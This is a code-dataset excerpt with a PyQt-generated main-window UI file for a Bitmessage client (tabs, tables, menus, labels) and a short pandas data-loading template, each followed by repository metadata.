self.youridentities.setObjectName(_fromUtf8("youridentities"))
self.gridLayout_3 = QtGui.QGridLayout(self.youridentities)
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.pushButtonNewAddress = QtGui.QPushButton(self.youridentities)
self.pushButtonNewAddress.setObjectName(_fromUtf8("pushButtonNewAddress"))
self.gridLayout_3.addWidget(self.pushButtonNewAddress, 0, 0, 1, 1)
spacerItem1 = QtGui.QSpacerItem(689, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout_3.addItem(spacerItem1, 0, 1, 1, 1)
self.tableWidgetYourIdentities = QtGui.QTableWidget(self.youridentities)
self.tableWidgetYourIdentities.setFrameShadow(QtGui.QFrame.Sunken)
self.tableWidgetYourIdentities.setLineWidth(1)
self.tableWidgetYourIdentities.setAlternatingRowColors(True)
self.tableWidgetYourIdentities.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)
self.tableWidgetYourIdentities.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.tableWidgetYourIdentities.setObjectName(_fromUtf8("tableWidgetYourIdentities"))
self.tableWidgetYourIdentities.setColumnCount(3)
self.tableWidgetYourIdentities.setRowCount(0)
item = QtGui.QTableWidgetItem()
font = QtGui.QFont()
font.setKerning(True)
item.setFont(font)
self.tableWidgetYourIdentities.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetYourIdentities.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetYourIdentities.setHorizontalHeaderItem(2, item)
self.tableWidgetYourIdentities.horizontalHeader().setCascadingSectionResizes(True)
self.tableWidgetYourIdentities.horizontalHeader().setDefaultSectionSize(346)
self.tableWidgetYourIdentities.horizontalHeader().setMinimumSectionSize(52)
self.tableWidgetYourIdentities.horizontalHeader().setSortIndicatorShown(True)
self.tableWidgetYourIdentities.horizontalHeader().setStretchLastSection(True)
self.tableWidgetYourIdentities.verticalHeader().setVisible(False)
self.tableWidgetYourIdentities.verticalHeader().setDefaultSectionSize(26)
self.tableWidgetYourIdentities.verticalHeader().setSortIndicatorShown(False)
self.tableWidgetYourIdentities.verticalHeader().setStretchLastSection(False)
self.gridLayout_3.addWidget(self.tableWidgetYourIdentities, 1, 0, 1, 2)
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/identities.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.tabWidget.addTab(self.youridentities, icon4, _fromUtf8(""))
self.subscriptions = QtGui.QWidget()
self.subscriptions.setObjectName(_fromUtf8("subscriptions"))
self.gridLayout_4 = QtGui.QGridLayout(self.subscriptions)
self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
self.label_5 = QtGui.QLabel(self.subscriptions)
self.label_5.setWordWrap(True)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.gridLayout_4.addWidget(self.label_5, 0, 0, 1, 2)
self.pushButtonAddSubscription = QtGui.QPushButton(self.subscriptions)
self.pushButtonAddSubscription.setObjectName(_fromUtf8("pushButtonAddSubscription"))
self.gridLayout_4.addWidget(self.pushButtonAddSubscription, 1, 0, 1, 1)
spacerItem2 = QtGui.QSpacerItem(689, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout_4.addItem(spacerItem2, 1, 1, 1, 1)
self.tableWidgetSubscriptions = QtGui.QTableWidget(self.subscriptions)
self.tableWidgetSubscriptions.setAlternatingRowColors(True)
self.tableWidgetSubscriptions.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)
self.tableWidgetSubscriptions.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.tableWidgetSubscriptions.setObjectName(_fromUtf8("tableWidgetSubscriptions"))
self.tableWidgetSubscriptions.setColumnCount(2)
self.tableWidgetSubscriptions.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.tableWidgetSubscriptions.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetSubscriptions.setHorizontalHeaderItem(1, item)
self.tableWidgetSubscriptions.horizontalHeader().setCascadingSectionResizes(True)
self.tableWidgetSubscriptions.horizontalHeader().setDefaultSectionSize(400)
self.tableWidgetSubscriptions.horizontalHeader().setHighlightSections(False)
self.tableWidgetSubscriptions.horizontalHeader().setSortIndicatorShown(False)
self.tableWidgetSubscriptions.horizontalHeader().setStretchLastSection(True)
self.tableWidgetSubscriptions.verticalHeader().setVisible(False)
self.gridLayout_4.addWidget(self.tableWidgetSubscriptions, 2, 0, 1, 2)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/subscriptions.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.tabWidget.addTab(self.subscriptions, icon5, _fromUtf8(""))
self.addressbook = QtGui.QWidget()
self.addressbook.setObjectName(_fromUtf8("addressbook"))
self.gridLayout_5 = QtGui.QGridLayout(self.addressbook)
self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
self.label_6 = QtGui.QLabel(self.addressbook)
self.label_6.setWordWrap(True)
self.label_6.setObjectName(_fromUtf8("label_6"))
self.gridLayout_5.addWidget(self.label_6, 0, 0, 1, 2)
self.pushButtonAddAddressBook = QtGui.QPushButton(self.addressbook)
self.pushButtonAddAddressBook.setObjectName(_fromUtf8("pushButtonAddAddressBook"))
self.gridLayout_5.addWidget(self.pushButtonAddAddressBook, 1, 0, 1, 1)
spacerItem3 = QtGui.QSpacerItem(689, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout_5.addItem(spacerItem3, 1, 1, 1, 1)
self.tableWidgetAddressBook = QtGui.QTableWidget(self.addressbook)
self.tableWidgetAddressBook.setAlternatingRowColors(True)
self.tableWidgetAddressBook.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection)
self.tableWidgetAddressBook.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.tableWidgetAddressBook.setObjectName(_fromUtf8("tableWidgetAddressBook"))
self.tableWidgetAddressBook.setColumnCount(2)
self.tableWidgetAddressBook.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.tableWidgetAddressBook.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetAddressBook.setHorizontalHeaderItem(1, item)
self.tableWidgetAddressBook.horizontalHeader().setCascadingSectionResizes(True)
self.tableWidgetAddressBook.horizontalHeader().setDefaultSectionSize(400)
self.tableWidgetAddressBook.horizontalHeader().setHighlightSections(False)
self.tableWidgetAddressBook.horizontalHeader().setStretchLastSection(True)
self.tableWidgetAddressBook.verticalHeader().setVisible(False)
self.gridLayout_5.addWidget(self.tableWidgetAddressBook, 2, 0, 1, 2)
icon6 = QtGui.QIcon()
icon6.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/addressbook.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.tabWidget.addTab(self.addressbook, icon6, _fromUtf8(""))
self.blackwhitelist = QtGui.QWidget()
self.blackwhitelist.setObjectName(_fromUtf8("blackwhitelist"))
self.gridLayout_6 = QtGui.QGridLayout(self.blackwhitelist)
self.gridLayout_6.setObjectName(_fromUtf8("gridLayout_6"))
self.radioButtonBlacklist = QtGui.QRadioButton(self.blackwhitelist)
self.radioButtonBlacklist.setChecked(True)
self.radioButtonBlacklist.setObjectName(_fromUtf8("radioButtonBlacklist"))
self.gridLayout_6.addWidget(self.radioButtonBlacklist, 0, 0, 1, 2)
self.radioButtonWhitelist = QtGui.QRadioButton(self.blackwhitelist)
self.radioButtonWhitelist.setObjectName(_fromUtf8("radioButtonWhitelist"))
self.gridLayout_6.addWidget(self.radioButtonWhitelist, 1, 0, 1, 2)
self.pushButtonAddBlacklist = QtGui.QPushButton(self.blackwhitelist)
self.pushButtonAddBlacklist.setObjectName(_fromUtf8("pushButtonAddBlacklist"))
self.gridLayout_6.addWidget(self.pushButtonAddBlacklist, 2, 0, 1, 1)
spacerItem4 = QtGui.QSpacerItem(689, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout_6.addItem(spacerItem4, 2, 1, 1, 1)
self.tableWidgetBlacklist = QtGui.QTableWidget(self.blackwhitelist)
self.tableWidgetBlacklist.setAlternatingRowColors(True)
self.tableWidgetBlacklist.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)
self.tableWidgetBlacklist.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.tableWidgetBlacklist.setObjectName(_fromUtf8("tableWidgetBlacklist"))
self.tableWidgetBlacklist.setColumnCount(2)
self.tableWidgetBlacklist.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.tableWidgetBlacklist.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetBlacklist.setHorizontalHeaderItem(1, item)
self.tableWidgetBlacklist.horizontalHeader().setCascadingSectionResizes(True)
self.tableWidgetBlacklist.horizontalHeader().setDefaultSectionSize(400)
self.tableWidgetBlacklist.horizontalHeader().setHighlightSections(False)
self.tableWidgetBlacklist.horizontalHeader().setSortIndicatorShown(False)
self.tableWidgetBlacklist.horizontalHeader().setStretchLastSection(True)
self.tableWidgetBlacklist.verticalHeader().setVisible(False)
self.gridLayout_6.addWidget(self.tableWidgetBlacklist, 3, 0, 1, 2)
icon7 = QtGui.QIcon()
icon7.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/blacklist.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.tabWidget.addTab(self.blackwhitelist, icon7, _fromUtf8(""))
self.networkstatus = QtGui.QWidget()
self.networkstatus.setObjectName(_fromUtf8("networkstatus"))
self.pushButtonStatusIcon = QtGui.QPushButton(self.networkstatus)
self.pushButtonStatusIcon.setGeometry(QtCore.QRect(680, 440, 21, 23))
self.pushButtonStatusIcon.setText(_fromUtf8(""))
icon8 = QtGui.QIcon()
icon8.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/redicon.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButtonStatusIcon.setIcon(icon8)
self.pushButtonStatusIcon.setFlat(True)
self.pushButtonStatusIcon.setObjectName(_fromUtf8("pushButtonStatusIcon"))
self.tableWidgetConnectionCount = QtGui.QTableWidget(self.networkstatus)
self.tableWidgetConnectionCount.setGeometry(QtCore.QRect(20, 70, 241, 241))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(212, 208, 200))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(212, 208, 200))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(212, 208, 200))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
self.tableWidgetConnectionCount.setPalette(palette)
self.tableWidgetConnectionCount.setFrameShape(QtGui.QFrame.Box)
self.tableWidgetConnectionCount.setFrameShadow(QtGui.QFrame.Plain)
self.tableWidgetConnectionCount.setProperty("showDropIndicator", False)
self.tableWidgetConnectionCount.setAlternatingRowColors(True)
self.tableWidgetConnectionCount.setSelectionMode(QtGui.QAbstractItemView.NoSelection)
self.tableWidgetConnectionCount.setObjectName(_fromUtf8("tableWidgetConnectionCount"))
self.tableWidgetConnectionCount.setColumnCount(2)
self.tableWidgetConnectionCount.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.tableWidgetConnectionCount.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.tableWidgetConnectionCount.setHorizontalHeaderItem(1, item)
self.tableWidgetConnectionCount.horizontalHeader().setCascadingSectionResizes(True)
self.tableWidgetConnectionCount.horizontalHeader().setHighlightSections(False)
self.tableWidgetConnectionCount.horizontalHeader().setStretchLastSection(True)
self.tableWidgetConnectionCount.verticalHeader().setVisible(False)
self.labelTotalConnections = QtGui.QLabel(self.networkstatus)
self.labelTotalConnections.setGeometry(QtCore.QRect(20, 30, 401, 16))
self.labelTotalConnections.setObjectName(_fromUtf8("labelTotalConnections"))
self.labelStartupTime = QtGui.QLabel(self.networkstatus)
self.labelStartupTime.setGeometry(QtCore.QRect(320, 110, 331, 20))
self.labelStartupTime.setObjectName(_fromUtf8("labelStartupTime"))
self.labelMessageCount = QtGui.QLabel(self.networkstatus)
self.labelMessageCount.setGeometry(QtCore.QRect(350, 130, 361, 16))
self.labelMessageCount.setObjectName(_fromUtf8("labelMessageCount"))
self.labelPubkeyCount = QtGui.QLabel(self.networkstatus)
self.labelPubkeyCount.setGeometry(QtCore.QRect(350, 170, 331, 16))
self.labelPubkeyCount.setObjectName(_fromUtf8("labelPubkeyCount"))
self.labelBroadcastCount = QtGui.QLabel(self.networkstatus)
self.labelBroadcastCount.setGeometry(QtCore.QRect(350, 150, 351, 16))
self.labelBroadcastCount.setObjectName(_fromUtf8("labelBroadcastCount"))
self.labelLookupsPerSecond = QtGui.QLabel(self.networkstatus)
self.labelLookupsPerSecond.setGeometry(QtCore.QRect(320, 250, 291, 16))
self.labelLookupsPerSecond.setObjectName(_fromUtf8("labelLookupsPerSecond"))
self.labelBytesRecvCount = QtGui.QLabel(self.networkstatus)
self.labelBytesRecvCount.setGeometry(QtCore.QRect(350, 210, 251, 16))
self.labelBytesRecvCount.setObjectName(_fromUtf8("labelBytesRecvCount"))
self.labelBytesSentCount = QtGui.QLabel(self.networkstatus)
self.labelBytesSentCount.setGeometry(QtCore.QRect(350, 230, 251, 16))
self.labelBytesSentCount.setObjectName(_fromUtf8("labelBytesSentCount"))
icon9 = QtGui.QIcon()
icon9.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/networkstatus.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.tabWidget.addTab(self.networkstatus, icon9, _fromUtf8(""))
self.gridLayout.addWidget(self.tabWidget, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 885, 21))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName(_fromUtf8("menuFile"))
self.menuSettings = QtGui.QMenu(self.menubar)
self.menuSettings.setObjectName(_fromUtf8("menuSettings"))
self.menuHelp = QtGui.QMenu(self.menubar)
self.menuHelp.setObjectName(_fromUtf8("menuHelp"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setMaximumSize(QtCore.QSize(16777215, 22))
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.actionImport_keys = QtGui.QAction(MainWindow)
self.actionImport_keys.setObjectName(_fromUtf8("actionImport_keys"))
self.actionManageKeys = QtGui.QAction(MainWindow)
self.actionManageKeys.setCheckable(False)
self.actionManageKeys.setEnabled(True)
icon = QtGui.QIcon.fromTheme(_fromUtf8("dialog-password"))
self.actionManageKeys.setIcon(icon)
self.actionManageKeys.setObjectName(_fromUtf8("actionManageKeys"))
self.actionExit = QtGui.QAction(MainWindow)
icon = QtGui.QIcon.fromTheme(_fromUtf8("application-exit"))
self.actionExit.setIcon(icon)
self.actionExit.setObjectName(_fromUtf8("actionExit"))
self.actionHelp = QtGui.QAction(MainWindow)
icon = QtGui.QIcon.fromTheme(_fromUtf8("help-contents"))
self.actionHelp.setIcon(icon)
self.actionHelp.setObjectName(_fromUtf8("actionHelp"))
self.actionAbout = QtGui.QAction(MainWindow)
icon = QtGui.QIcon.fromTheme(_fromUtf8("help-about"))
self.actionAbout.setIcon(icon)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.actionSettings = QtGui.QAction(MainWindow)
icon = QtGui.QIcon.fromTheme(_fromUtf8("document-properties"))
self.actionSettings.setIcon(icon)
self.actionSettings.setObjectName(_fromUtf8("actionSettings"))
self.actionRegenerateDeterministicAddresses = QtGui.QAction(MainWindow)
icon = QtGui.QIcon.fromTheme(_fromUtf8("view-refresh"))
self.actionRegenerateDeterministicAddresses.setIcon(icon)
self.actionRegenerateDeterministicAddresses.setObjectName(_fromUtf8("actionRegenerateDeterministicAddresses"))
self.actionDeleteAllTrashedMessages = QtGui.QAction(MainWindow)
icon = QtGui.QIcon.fromTheme(_fromUtf8("user-trash"))
self.actionDeleteAllTrashedMessages.setIcon(icon)
self.actionDeleteAllTrashedMessages.setObjectName(_fromUtf8("actionDeleteAllTrashedMessages"))
self.actionJoinChan = QtGui.QAction(MainWindow)
icon = QtGui.QIcon.fromTheme(_fromUtf8("contact-new"))
self.actionJoinChan.setIcon(icon)
self.actionJoinChan.setObjectName(_fromUtf8("actionJoinChan"))
self.menuFile.addAction(self.actionManageKeys)
self.menuFile.addAction(self.actionDeleteAllTrashedMessages)
self.menuFile.addAction(self.actionRegenerateDeterministicAddresses)
self.menuFile.addAction(self.actionJoinChan)
self.menuFile.addAction(self.actionExit)
self.menuSettings.addAction(self.actionSettings)
self.menuHelp.addAction(self.actionHelp)
self.menuHelp.addAction(self.actionAbout)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuSettings.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
QtCore.QObject.connect(self.radioButtonSpecific, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.lineEditTo.setEnabled)
QtCore.QObject.connect(self.radioButtonSpecific, QtCore.SIGNAL(_fromUtf8("clicked(bool)")), self.labelSendBroadcastWarning.hide)
QtCore.QObject.connect(self.radioButtonBroadcast, QtCore.SIGNAL(_fromUtf8("clicked()")), self.labelSendBroadcastWarning.show)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
MainWindow.setTabOrder(self.tabWidget, self.tableWidgetInbox)
MainWindow.setTabOrder(self.tableWidgetInbox, self.textEditInboxMessage)
MainWindow.setTabOrder(self.textEditInboxMessage, self.radioButtonSpecific)
MainWindow.setTabOrder(self.radioButtonSpecific, self.radioButtonBroadcast)
MainWindow.setTabOrder(self.radioButtonBroadcast, self.comboBoxSendFrom)
MainWindow.setTabOrder(self.comboBoxSendFrom, self.lineEditTo)
MainWindow.setTabOrder(self.lineEditTo, self.pushButtonLoadFromAddressBook)
MainWindow.setTabOrder(self.pushButtonLoadFromAddressBook, self.lineEditSubject)
MainWindow.setTabOrder(self.lineEditSubject, self.textEditMessage)
MainWindow.setTabOrder(self.textEditMessage, self.pushButtonSend)
MainWindow.setTabOrder(self.pushButtonSend, self.tableWidgetSent)
MainWindow.setTabOrder(self.tableWidgetSent, self.textEditSentMessage)
MainWindow.setTabOrder(self.textEditSentMessage, self.pushButtonNewAddress)
MainWindow.setTabOrder(self.pushButtonNewAddress, self.tableWidgetYourIdentities)
MainWindow.setTabOrder(self.tableWidgetYourIdentities, self.pushButtonAddSubscription)
MainWindow.setTabOrder(self.pushButtonAddSubscription, self.tableWidgetSubscriptions)
MainWindow.setTabOrder(self.tableWidgetSubscriptions, self.pushButtonAddAddressBook)
MainWindow.setTabOrder(self.pushButtonAddAddressBook, self.tableWidgetAddressBook)
MainWindow.setTabOrder(self.tableWidgetAddressBook, self.radioButtonBlacklist)
MainWindow.setTabOrder(self.radioButtonBlacklist, self.radioButtonWhitelist)
MainWindow.setTabOrder(self.radioButtonWhitelist, self.pushButtonAddBlacklist)
MainWindow.setTabOrder(self.pushButtonAddBlacklist, self.tableWidgetBlacklist)
MainWindow.setTabOrder(self.tableWidgetBlacklist, self.tableWidgetConnectionCount)
MainWindow.setTabOrder(self.tableWidgetConnectionCount, self.pushButtonStatusIcon)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Bitmessage", None))
self.inboxSearchLineEdit.setPlaceholderText(_translate("MainWindow", "Search", None))
self.inboxSearchOptionCB.setItemText(0, _translate("MainWindow", "All", None))
self.inboxSearchOptionCB.setItemText(1, _translate("MainWindow", "To", None))
self.inboxSearchOptionCB.setItemText(2, _translate("MainWindow", "From", None))
self.inboxSearchOptionCB.setItemText(3, _translate("MainWindow", "Subject", None))
self.inboxSearchOptionCB.setItemText(4, _translate("MainWindow", "Message", None))
self.tableWidgetInbox.setSortingEnabled(True)
item = self.tableWidgetInbox.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "To", None))
item = self.tableWidgetInbox.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "From", None))
item = self.tableWidgetInbox.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "Subject", None))
item = self.tableWidgetInbox.horizontalHeaderItem(3)
item.setText(_translate("MainWindow", "Received", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.inbox), _translate("MainWindow", "Inbox", None))
self.pushButtonLoadFromAddressBook.setText(_translate("MainWindow", "Load from Address book", None))
self.label_3.setText(_translate("MainWindow", "Subject:", None))
self.pushButtonSend.setText(_translate("MainWindow", "Send", None))
self.labelHumanFriendlyTTLDescription.setText(_translate("MainWindow", "X days", None))
self.label_4.setText(_translate("MainWindow", "Message:", None))
self.label.setText(_translate("MainWindow", "To:", None))
self.radioButtonSpecific.setText(_translate("MainWindow", "Send to one or more specific people", None))
self.labelSendBroadcastWarning.setText(_translate("MainWindow", "Be aware that broadcasts are only encrypted with your address. Anyone who knows your address can read them.", None))
self.radioButtonBroadcast.setText(_translate("MainWindow", "Broadcast to everyone who is subscribed to your address", None))
self.pushButtonTTL.setText(_translate("MainWindow", "TTL:", None))
self.label_2.setText(_translate("MainWindow", "From:", None))
self.textEditMessage.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>", None))
self.pushButtonFetchNamecoinID.setText(_translate("MainWindow", "Fetch Namecoin ID", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.send), _translate("MainWindow", "Send", None))
self.sentSearchLineEdit.setPlaceholderText(_translate("MainWindow", "Search", None))
self.sentSearchOptionCB.setItemText(0, _translate("MainWindow", "All", None))
self.sentSearchOptionCB.setItemText(1, _translate("MainWindow", "To", None))
self.sentSearchOptionCB.setItemText(2, _translate("MainWindow", "From", None))
self.sentSearchOptionCB.setItemText(3, _translate("MainWindow", "Subject", None))
self.sentSearchOptionCB.setItemText(4, _translate("MainWindow", "Message", None))
self.tableWidgetSent.setSortingEnabled(True)
item = self.tableWidgetSent.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "To", None))
item = self.tableWidgetSent.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "From", None))
item = self.tableWidgetSent.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "Subject", None))
item = self.tableWidgetSent.horizontalHeaderItem(3)
item.setText(_translate("MainWindow", "Status", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.sent), _translate("MainWindow", "Sent", None))
self.pushButtonNewAddress.setText(_translate("MainWindow", "New", None))
self.tableWidgetYourIdentities.setSortingEnabled(True)
item = self.tableWidgetYourIdentities.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "Label (not shown to anyone)", None))
item = self.tableWidgetYourIdentities.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "Address", None))
item = self.tableWidgetYourIdentities.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "Stream", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.youridentities), _translate("MainWindow", "Your Identities", None))
self.label_5.setText(_translate("MainWindow", "Here you can subscribe to \'broadcast messages\' that are sent by other users. Messages will appear in your Inbox. Addresses here override those on the Blacklist tab.", None))
self.pushButtonAddSubscription.setText(_translate("MainWindow", "Add new Subscription", None))
self.tableWidgetSubscriptions.setSortingEnabled(True)
item = self.tableWidgetSubscriptions.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "Label", None))
item = self.tableWidgetSubscriptions.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "Address", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.subscriptions), _translate("MainWindow", "Subscriptions", None))
self.label_6.setText(_translate("MainWindow", "The Address book is useful for adding names or labels to other people\'s Bitmessage addresses so that you can recognize them more easily in your inbox. You can add entries here using the \'Add\' button, or from your inbox by right-clicking on a message.", None))
self.pushButtonAddAddressBook.setText(_translate("MainWindow", "Add new entry", None))
self.tableWidgetAddressBook.setSortingEnabled(True)
item = self.tableWidgetAddressBook.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "Name or Label", None))
item = self.tableWidgetAddressBook.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "Address", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.addressbook), _translate("MainWindow", "Address Book", None))
self.radioButtonBlacklist.setText(_translate("MainWindow", "Use a Blacklist (Allow all incoming messages except those on the Blacklist)", None))
self.radioButtonWhitelist.setText(_translate("MainWindow", "Use a Whitelist (Block all incoming messages except those on the Whitelist)", None))
self.pushButtonAddBlacklist.setText(_translate("MainWindow", "Add new entry", None))
self.tableWidgetBlacklist.setSortingEnabled(True)
item = self.tableWidgetBlacklist.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "Name or Label", None))
item = self.tableWidgetBlacklist.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "Address", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.blackwhitelist), _translate("MainWindow", "Blacklist", None))
item = self.tableWidgetConnectionCount.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "Stream #", None))
item = self.tableWidgetConnectionCount.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "Connections", None))
self.labelTotalConnections.setText(_translate("MainWindow", "Total connections:", None))
self.labelStartupTime.setText(_translate("MainWindow", "Since startup:", None))
self.labelMessageCount.setText(_translate("MainWindow", "Processed 0 person-to-person messages.", None))
self.labelPubkeyCount.setText(_translate("MainWindow", "Processed 0 public keys.", None))
self.labelBroadcastCount.setText(_translate("MainWindow", "Processed 0 broadcasts.", None))
self.labelLookupsPerSecond.setText(_translate("MainWindow", "Inventory lookups per second: 0", None))
self.labelBytesRecvCount.setText(_translate("MainWindow", "Down: 0 KB/s", None))
self.labelBytesSentCount.setText(_translate("MainWindow", "Up: 0 KB/s", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.networkstatus), _translate("MainWindow", "Network Status", None))
self.menuFile.setTitle(_translate("MainWindow", "File", None))
self.menuSettings.setTitle(_translate("MainWindow", "Settings", None))
self.menuHelp.setTitle(_translate("MainWindow", "Help", None))
self.actionImport_keys.setText(_translate("MainWindow", "Import keys", None))
self.actionManageKeys.setText(_translate("MainWindow", "Manage keys", None))
self.actionExit.setText(_translate("MainWindow", "Quit", None))
self.actionExit.setShortcut(_translate("MainWindow", "Ctrl+Q", None))
self.actionHelp.setText(_translate("MainWindow", "Help", None))
self.actionHelp.setShortcut(_translate("MainWindow", "F1", None))
self.actionAbout.setText(_translate("MainWindow", "About", None))
self.actionSettings.setText(_translate("MainWindow", "Settings", None))
self.actionRegenerateDeterministicAddresses.setText(_translate("MainWindow", "Regenerate deterministic addresses", None))
self.actionDeleteAllTrashedMessages.setText(_translate("MainWindow", "Delete all trashed messages", None))
self.actionJoinChan.setText(_translate("MainWindow", "Join / Create chan", None))
import bitmessage_icons_rc
| {
"content_hash": "9ed62d69a75a5719eb98e6b90535b92b",
"timestamp": "",
"source": "github",
"line_count": 685,
"max_line_length": 317,
"avg_line_length": 68.97080291970804,
"alnum_prop": 0.7347444173986665,
"repo_name": "JosephGoulden/PyBitmessageF2F",
"id": "e35b30cd22b32c2e7e8a611dc4395cb33f36492f",
"size": "47479",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "src/bitmessageqt/bitmessageui.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2834"
},
{
"name": "Python",
"bytes": "990111"
},
{
"name": "QMake",
"bytes": "11274"
},
{
"name": "Shell",
"bytes": "14814"
}
],
"symlink_target": ""
} |
"""Input functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import pandas as pd
SCHEMA = {{ schema }}
TARGET = "{{ target }}"
def download_data(train_path, eval_path):
"""Downloads train and eval datasets from GCP.
Args:
train_path: GCS path to training data.
eval_path: GCS path to evaluation data.
Returns:
train_x: dataframe of training features.
train_y: dataframe of training labels.
eval_x: dataframe of eval features.
eval_y: dataframe of eval labels.
"""
train_df = pd.read_csv(train_path, names=SCHEMA)
eval_df = pd.read_csv(eval_path, names=SCHEMA)
train_x, train_y = train_df.drop(TARGET, axis=1), train_df[TARGET]
eval_x, eval_y = eval_df.drop(TARGET, axis=1), eval_df[TARGET]
train_y, eval_y = [np.ravel(x) for x in [train_y, eval_y]]
return train_x, train_y, eval_x, eval_y
| {
"content_hash": "8715f898d799f60fcc5d7016b83d6031",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 70,
"avg_line_length": 28.705882352941178,
"alnum_prop": 0.6495901639344263,
"repo_name": "GoogleCloudPlatform/ml-pipeline-generator-python",
